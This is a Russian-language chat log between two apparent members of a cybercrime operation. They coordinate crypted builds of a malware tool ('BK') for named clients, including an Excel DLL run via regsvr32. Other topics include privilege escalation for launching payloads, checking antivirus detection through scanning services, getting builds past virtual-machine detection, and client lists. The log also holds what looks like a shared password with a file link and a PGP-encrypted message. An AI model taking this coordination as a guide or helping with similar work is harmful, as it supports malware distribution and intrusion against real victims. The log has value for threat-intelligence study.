[14.12.21 08:15:55] manuel:		Првиет. Спасибо!
[14.12.21 08:16:05] manuel:		Можно будет сделать рантайм на динчеке?
[14.12.21 08:18:33] collin:		можно
[14.12.21 08:18:47] collin:		ты сам сделаешь, или Вилду прогнать?
[14.12.21 08:19:47] manuel:		Я сделаю
[24.12.21 09:43:58] manuel:		Привет, у меня вопрос по бу
[24.12.21 09:46:26] collin:		привет!
[24.12.21 09:46:36] collin:		что такое бу?
[24.12.21 09:47:03] manuel:		Бк. ) Опечатка
[24.12.21 09:48:12] manuel:		Вопрос  по сборкам для команды Деркка - Рамона. Они говорят о каких-то повышениях правд до da и просят это реализовать в БК для мак ос
[24.12.21 09:51:06] collin:		давай в канале спросим
[24.12.21 09:53:49] manuel:		Ага.
[24.12.21 11:42:10] manuel:		Еще вопрос.
[24.12.21 11:42:38] manuel:		А в виндовом бк не появилось возможности запускать нагрузк от адмнистратора? Повершел скрипт или батник.
[24.12.21 11:42:59] manuel:		Рамону надо чтобы скрипт по запуску закрепа атера - легал софт выполнился от админа
[24.12.21 11:43:48] collin:		как раз работаю над этим вопросом
[24.12.21 11:43:59] collin:		с Силвером согласовали - запуск с повышением прав внешним софтом будет
[24.12.21 11:44:07] collin:		часть уже есть, вчера дереку мануал скинул
[24.12.21 11:44:10] collin:		могу тебе направить
[24.12.21 11:44:29] manuel:		да давай мне интересно тоже
[24.12.21 11:44:33] collin:		ну как часть повышение через UAC есть, с LPE все сложно
[24.12.21 11:44:43] collin:		сейчас вот только три варианта рассмотрел - а уже попатчили их
[24.12.21 11:45:36] collin:		```
m9lr$Bdj8ke^N4su8DkrnD
https://privatlab.com/s/v/nRqYRYWdaQh3anz2kjbn
```
[24.12.21 12:31:35] collin:		еще уточни плз у партнеров для кого БК через тебя выдавали - планирует ли кто работать в новогодние каникулы
[24.12.21 12:31:47] collin:		в какие дни, каких и сколько сборок нужно будет
[24.12.21 12:31:54] manuel:		ок.
[24.12.21 13:05:48] manuel:		Еще вопрос.
[24.12.21 13:06:13] manuel:		а у нас есть js_bk ? Его юзает кто-нибудь?
[24.12.21 13:06:41] collin:		уточню
[24.12.21 13:06:59] collin:		в работу еще не пускали это точно
[14.01.22 14:41:39] manuel:		Првиет.
[14.01.22 14:42:06] collin:		привет!
[14.01.22 14:42:16] manuel:		У адама вопрос,  кто из клиентов заказывает БК у тебя
[14.01.22 14:42:25] manuel:		Ему нужен список.
[14.01.22 14:42:55] collin:		за последнее время меньше людей стало чем раньше брали
[14.01.22 14:43:08] collin:		за какой период список дать?
[14.01.22 14:43:20] manuel:		На сейчас с начала года
[14.01.22 14:43:35] collin:		тебе написать?
[14.01.22 14:44:41] manuel:		Да Я собиру еще со своими и передам ему
[14.01.22 14:45:37] collin:		в этом году пока трое брали БК
[14.01.22 14:45:41] collin:		```
1. derek
2. Розетка
3. Золотой
```
[14.01.22 14:46:50] manuel:		ТАк а вообще кто еще брал?
[14.01.22 14:49:54] collin:		```
dylon
zevs
love
balzak
fatboy
через тебя брали: sentinel netwalker + red/таргет на отдельной админке

```
[14.01.22 14:49:59] collin:		это в прошлом году
[14.01.22 14:50:11] manuel:		понял.
[20.01.22 10:30:30] manuel:		Привет.
[20.01.22 10:30:39] manuel:		У меня есть вопрос.
[20.01.22 10:40:31] collin:		привет!
[20.01.22 10:44:57] manuel:		У меня вопрос по нагрузке на тестировщиков
[20.01.22 10:45:12] manuel:		Все загружены? Или тестировщиков больше чем нужно?
[20.01.22 10:58:47] collin:		сейчас 3 тестировщика, 2 нагружено регулярно, 3й odis в половину
[20.01.22 10:58:58] collin:		одиса реже привлекаю, т.к. он говорил что другие задачи есть
[20.01.22 11:05:46] manuel:		Понятно.
[27.01.22 10:06:00] collin:		привет!
[27.01.22 10:06:14] collin:		вопрос по тестеровщикам которые на БК: nick wild odis
[27.01.22 10:06:34] collin:		они сейчас только БК занимаются, или бывает что другими задачами?
[27.01.22 10:09:52] manuel:		Да у вех есть еще другая активнось. nick wild - регают еще домены и впски. odis работает тестировщико локеров.
[27.01.22 10:10:20] collin:		ок
[28.01.22 08:19:14] collin:		Привет!
[28.01.22 08:19:42] manuel:		Привет
[28.01.22 08:19:52] collin:		динчек что-то висит, сегодня один план на динамику срок оплаты, изза этого может?
[28.01.22 08:20:04] manuel:		Щас гляну
[28.01.22 08:25:47] manuel:		Все ок в скане в веб интерфейсе. Бывает что при работе с api так долго висит. Ты из панели смотришь?
[28.01.22 08:39:47] collin:		да в панели тесты со вчера крутятся и автотесты не прошли
[31.01.22 09:14:45] manuel:		Привет. У меня вопрос.
[31.01.22 09:25:23] collin:		привет!
[31.01.22 09:26:54] collin:		тест
[31.01.22 09:27:02] manuel:		ага
[31.01.22 09:27:07] manuel:		е2е вроде работает
[31.01.22 09:27:11] collin:		работает
[31.01.22 09:27:15] collin:		хочешь на отр пере5йти?
[31.01.22 09:27:39] manuel:		Зевс сказал, что у тебя есть исходники их ботов и лоадера. Просит почистить. Можем организовать чистку?
[31.01.22 09:28:30] collin:		Этим вопросом Элрой занимается
[31.01.22 09:28:55] collin:		организовывать он будет, как старший тимлид. Материалы я ему передал
[31.01.22 09:29:07] manuel:		Понял картину. Спасибо.
[01.02.22 08:15:45] collin:		Привет!
[01.02.22 08:15:49] collin:		`According to your plan you have exceeded the limit of the number of checks per day`
[01.02.22 08:15:52] collin:		динчек пишет
[01.02.22 08:16:02] collin:		действительно все изчекали, или тупит?
[01.02.22 08:29:47] manuel:		Тупит сейчас гляну
[01.02.22 14:52:12] manuel:		Привет, еще раз
[01.02.22 14:52:37] manuel:		Сможем селать БК для netwalker@ ? Делалиему как-то в конце прошлого года.
[01.02.22 14:53:03] manuel:		ему длл под ехель
[01.02.22 14:53:43] collin:		какая точка входа вдлл?
[01.02.22 14:55:58] manuel:		DllRegisterServer
[01.02.22 14:56:23] collin:		у него группа была а учетки нет походу
[01.02.22 14:56:31] manuel:		ага
[01.02.22 14:56:42] collin:		через тебя будем выдавать?
[01.02.22 14:57:03] manuel:		да можно, либо через тестеров
[01.02.22 14:57:15] collin:		завтра делаем? сегодня не успеем видимо
[01.02.22 14:57:23] manuel:		хорошо завтра
[02.02.22 07:26:57] manuel:		Привет, сделаем сборку БК длл под ехель для netwalker@ ?
[02.02.22 07:55:48] collin:		привет!
[02.02.22 07:56:04] collin:		задачу поставил, крипт будет готовить odis
[02.02.22 07:56:25] collin:		направит тогда  netwalker@ и тебе продублирует?
[02.02.22 08:19:18] manuel:		мне потому что я дам докеру
[02.02.22 08:21:47] collin:		+
[02.02.22 11:57:07] manuel:		получил сборку бк. Сделаешь еще учетку для него?
[02.02.22 11:58:13] collin:		сделаля. скинул ему
[02.02.22 11:58:16] collin:		тебе продублировать?
[02.02.22 11:58:48] manuel:		да мне смотреть отстук при проверке ехеля
[02.02.22 11:59:18] collin:		у тебя же есть учетка там СА
[02.02.22 11:59:21] collin:		группу 29 будет видно
[02.02.22 11:59:56] manuel:		какая адмика?
[04.02.22 07:08:08] manuel:		Доброе утро. Нужна свежая сборка БК для netwalker@. Так же 29 группа dllб regsvr32 под ехель
[04.02.22 07:17:27] collin:		привет!
[04.02.22 07:17:28] collin:		ок
[04.02.22 11:04:37] manuel:		Есть новсти по крипту БК?
[04.02.22 11:06:26] collin:		минут через 15 Одис выдаст
[04.02.22 11:06:53] manuel:		хорошо
[04.02.22 11:15:29] collin:		скажи SAM не криптует у нас, не в курсе?
[04.02.22 11:15:50] manuel:		Время от времени криптует
[07.02.22 13:02:36] manuel:		Добрый день. Сделайте, пожалуйста, длл крипт БК для netwalker под ехель с запуском regsvr32
[07.02.22 13:03:52] collin:		привет!
[07.02.22 13:03:53] collin:		ок
[07.02.22 13:07:12] collin:		заказал, Одис выдаст
[07.02.22 13:09:35] manuel:		Хорошо. Жду. Спасибо )
[11.02.22 14:44:03] collin:		привет!"
[11.02.22 14:44:23] manuel:		Првиет
[11.02.22 14:44:39] collin:		не в курсе как настроить ВМ на нашем proxmox чтобы наши крипты там отрабатывали?
[11.02.22 14:44:51] collin:		суть в чем, там какой-то признак виртуализации, который крипты рубят
[11.02.22 14:45:06] collin:		Гатор настраивал както, а митзи не получается
[11.02.22 14:45:08] collin:		может ты знаешь
[11.02.22 14:45:16] manuel:		К сожаоению нет
[11.02.22 14:45:27] manuel:		Может элрой чем-то может помочь или рокко
[14.02.22 12:37:49] manuel:		Привет.
[14.02.22 12:38:03] collin:		привет!
[14.02.22 12:38:27] manuel:		манго сказал выдавать БК еще ford@
[14.02.22 12:38:34] manuel:		Он стукнет тебе в жабу?
[14.02.22 12:39:19] collin:		ок
[18.02.22 08:10:59] collin:		привет!
[18.02.22 08:11:03] collin:		а что с динчеком, не в курсе?
[18.02.22 08:11:18] manuel:		Привет. Нет. Что-то у них самих там
[18.02.22 08:11:32] manuel:		Похоже что ддос или кто-то снес все
[18.02.22 08:11:42] manuel:		У тебя есть доступ в авчек?
[18.02.22 08:12:04] collin:		нету
[18.02.22 08:12:07] collin:		можешь дать?
[18.02.22 08:12:32] collin:		а они где-нить пишут обстановку новости по ситуации, типа твиттера?
[18.02.22 08:13:05] manuel:		Не знаю. Про это сейчас дам
[18.02.22 08:14:58] manuel:		```
-----BEGIN PGP MESSAGE-----

hQIMA/SQT1otRH73AQ/+IjpGo85ZOwZju2Yg0mHoDk1R+Aw+37ytoAzsUOFEZe0j
inO1mjwy0TLLQp/KLhTVDNSZVWyOYtrQZqVoP+sEWW2MLkJ03RtXyL1HDk+J0Ycg
vBYuVYETtPBr0D363db3xQbWsCk3uokZCUwKI1jyEQuKrQ22zvKg9dIzqY6425Gi
w5ndeOhvRH1BKwvyQMgYoPeDAMja2uNm9LEPko44RFd8XAf18XeNP6KOC7Hswxbi
kEgjeTqaP7/QcEOL6sS08PBXq+4AsG2cmsvXck9wmp3GBqby3Kpnbmicu9cX8VZT
Vot5+dFWKY2iL+V6IdLucproGzBcVQ/+oe4jQnLj2KVLbYn0SogP5g7NJvBsN3Ay
ewlqrI06afZQlCKJPQMwhhhnNX18lOqqE/RXuc84k51EIbT3wJ8Hn5FPc/HbGTmu
n8HRFcmdglAM6o8JmdoEAApBnN7InyJNqEKGAcAzNZWn4PEVJHXorFaiHVP0TKV2
FMR7oaRl43YlO/ssgQABJCAhyroxcHBrYhQa+BaVKEawKn9TxHeDyhD4U6LIncOH
BifsdiKvi9BsE9dHJvtscs+tun/jyqO/6HNRxv0WSmVMGCZ5uR4+j1PtuoIZp2VG
yY10xH5tV4BU43V9roO4lPTp+aCQ5lRfoOfKVZz2af63bgds4PskBQt7VkUMNAjS
6QHQHQZiX/ik7fb+sf8yMDZ4TDElfOb7BhphmlLOg6Y5NDKce3qxsms08MLnvSq0
6WWlyHL+1Dis1+Zz6cV+af1wCzl+nsbwY8smnRMB3Kfj0DwjXuuDiZmVOVIVmqbF
Pd5qrNpRHtCuQK+kKMSidSnuSnPlpcBvKtkSBerJyU3TOfuAMoe7VinLOfgcR40M
M1RDfXZ9ePRGLvDlIZNq15u9HmcpwrBjmU+LDA0FHcxWqgf83XqNxSFbx0eeF+be
+RLwPlhcNbRihzfoQcesQfuLQcONiOQxFa8S7neYbNBcDcM1EFEX8M6A57lR9FCW
S9TmPTlMFU+FcPco+AWw+7MLy566VYG6lMM6Md++JhHTxWwcyANl71VX4Xv/0r30
J/ElLMVpdNU+0aC/1mri4KTLC/fn/ZxQ15YcamLhdFjUklis7Li0Y0DqKnzbU8ag
ffm/eLxOlQABTaLkUQKATe+54gbN+285sKGSk4exUjZtMtn0+gQ4oDFO7VMsaLF1
oohNqiBpyJsjNaofcI0YlRo6X+Yi38g60cWgoWUu/iDK1yeIOuwMU1fj7t+johTb
AmnkYsCsIsDpcHNXCPCrE+0lBh4JRwtqnaNA2UzqjSJ0eHyg0rBKOmZ+Ri78WL9u
+6Mk4O/kbD4s6R29BFvjYs4P9WR6Htc/rP3vlOc+x6K+PlFf4ZR0MClvJ4h3/2MU
DVnBofGlq+d+TlnNLetlgee70uA5tgSo07ju+jEcLmdtgiucRzQWaVTmLaRD/meh
=NJ0Q
-----END PGP MESSAGE-----
```
[18.02.22 08:17:36] collin:		+
[18.02.22 08:19:42] collin:		там есть какие то настройки сканирования?
[18.02.22 08:19:56] manuel:		нет просто скан файлов или доменов
[18.02.22 08:20:04] collin:		ок
